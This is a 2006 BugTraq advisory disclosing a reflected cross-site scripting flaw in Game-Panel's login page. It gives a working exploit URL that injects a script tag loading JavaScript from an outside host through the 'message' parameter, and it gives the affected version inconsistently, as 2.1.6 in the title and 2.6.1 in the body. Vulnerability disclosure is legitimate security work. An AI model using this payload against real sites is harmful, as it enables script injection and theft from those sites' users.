BugTraq
Game-Panel <= 2.1.6 XSS Mar 04 2006 08:28PM
retard 30gigs com
ORIGIONAL SOURCE: http://notlegal.ws/gamepanel.txt

summary
software: Game-Panel
vendors website: http://game-panel.com
versions: <= 2.6.1
class: remote
status: unpatched
exploit: available
solution: not available
discovered by: sycko
risk level: medium
description
game-panel uses a global variable to print out
error messages on their login page allowing
execution of javascript
exploit(s)
http://example.com/login.php?message=%3CSCRIPT%20SRC=http://notlegal.ws/
xss.js%3E%3C/SCRIPT%3E

credit
author(s): retard, jim, and sycko
email: retard (at) 30gigs (dot) com [email concealed]

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus